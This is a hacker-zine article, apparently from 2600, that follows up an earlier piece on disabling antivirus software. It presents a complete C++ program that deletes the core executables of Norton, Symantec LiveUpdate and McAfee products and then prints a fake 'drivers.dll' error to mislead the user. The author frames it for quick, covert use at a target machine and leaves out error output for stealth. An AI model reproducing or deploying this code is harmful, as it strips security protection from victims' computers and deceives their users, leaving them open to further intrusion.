AVS Spanner Addendum

by Suicidal

This article is a follow-up on "A Simple But Effective Spanner In Your AVS" by Irving Washington in the 21:1 issue.

When I read this article, it amazed me that the code monkeys at these various software companies could have overlooked such a simple attack... deleting the core files that their products need to run.  So I began to play with it myself and, sure enough, renames and deletes are easily done in real-time without the need to shut down the software.

As Irving put it, "This is obviously not good!"

The main point to this article is a rewrite of the source code, but this time in C++.  Why the rewrite?  For a few reasons.  Let me state that there was nothing "wrong" with Irving's code.  I rewrote the code in C++ for a few reasons.

First off, C is easily compiled on a Linux box without needing lots of extra programs and IDEs to do it.  While this code may have a few problems on Linux (I don't have a Linux box to check it right now), it is easily fixed.  (If you are trying on Linux and it will not compile, change [cstdio] to [stdio.h] and that may fix it.)

Second, if you are trying to get in and get out quickly, meaning you are doing this in person and at the actual machine, then you want extremely streamlined code that will execute quickly.  The code I have attached is streamlined and will execute ungodly fast.  One major thing that makes it faster is that it does not check to see if the file is there or not.  If it is, it will delete it.  If it isn't, it continues on.  I did not add any error messages or codes to the code either for speed and covertness.

The rest of the reasons I have already forgotten, unless it was something along the lines of less bulky code or the hacker ethic of taking something and making it better or more personalized.  Shrug.  Maybe I just haven't seen my name in print in awhile and figured I could ride Irving's coattail into fame and shame.

I did add the same line on the end to prompt the user that a driver file was not found and that the application failed.  If you are doing this yourself, then you can leave that line out of the code.  You can also remove the "#include [iostream]" and "using namespace std;" lines as well, as they are only there to support the one line of text output at the end.

You can also easily see where the files slated for deletion are.  You can add your own, as many as you would like.  Just make sure you get the path correct and use "/" for the path and not "\".

So there you have it.  Irving, I did take the ten seconds to appreciate it.  Nice work.

#include <cstdio> #include <iostream> using namespace std; int main() { remove("C:/Program Files/Navnt/alertsvc.exe"); remove("C:/Program Files/Navnt/BackLog.exe"); remove("C:/Program Files/Navnt/BootWarn.exe"); remove("C:/Program Files/Navnt/DefAlert.exe"); remove("C:/Program Files/Navnt/n32scanw.exe"); remove("C:/Program Files/Navnt/navapsvc.exe"); remove("C:/Program Files/Navnt/navapw32.exe"); remove("C:/Program Files/Navnt/NavUStub.exe"); remove("C:/Program Files/Navnt/navwnt.exe"); remove("C:/Program Files/Navnt/NPSCheck.exe"); remove("C:/Program Files/Navnt/npssvc.exe"); remove("C:/Program Files/Navnt/NSPlugin.exe"); remove("C:/Program Files/Navnt/NtaskMgr.exe"); remove("C:/Program Files/Navnt/nvlaunch.exe"); remove("C:/Program Files/Navnt/POProxy.exe"); remove("C:/Program Files/Navnt/qconsole.exe"); remove("C:/Program Files/Navnt/ScnHndlr.exe"); remove("C:/Program Files/Symantec/LiveUpdate/ndetect.exe"); remove("C:/Program Files/Symantec/LiveUpdate/aupdate.exe"); remove("C:/Program Files/Symantec/LiveUpdate/luall.exe"); remove("C:/Program Files/Symantec/LiveUpdate/LuComServer.exe"); remove("C:/Program Files/McAfee/McAfee Internet Security/gd32.exe"); remove("C:/Program Files/McAfee/McAfee Internet Security/gdlaunch.exe"); remove("C:/Program Files/McAfee/McAfee Internet Security/gdcrypt.exe"); remove("C:/Program Files/McAfee/McAfee Internet Security/GuardDog.exe"); remove("C:/Program Files/McAfee/McAfee Internet Security/IView.exe"); remove("C:/Program Files/McAfee/McAfee Firewall/cpd.exe"); remove("C:/Program Files/McAfee/McAfee Shared Components/VisualTrace/NeoTrace.exe"); remove("C:/Program Files/McAfee/McAfee Shared Components/Shredder/shred32.exe"); remove("C:/Program Files/McAfee/McAfee Shared Components/QuickClean Lite/QClean.exe"); remove("C:/Program Files/McAfee/McAfee Shared Components/Instant Updater/RuLaunch.exe"); remove("C:/Program Files/McAfee/McAfee Shared Components/Guardian/CMGrdian.exe"); remove("C:/Program Files/McAfee/McAfee Shared Components/Guardian/schedwiz.exe"); remove("C:/Program Files/McAfee/McAfee Shared Components/Central/CLaunch.exe"); remove("C:/Program Files/McAfee/McAfee Internet Security/"); cout << "Could not find dev/null/drivers.dll. Application failed to start." << endl; return 0; }

Code: avs_spanner2.cc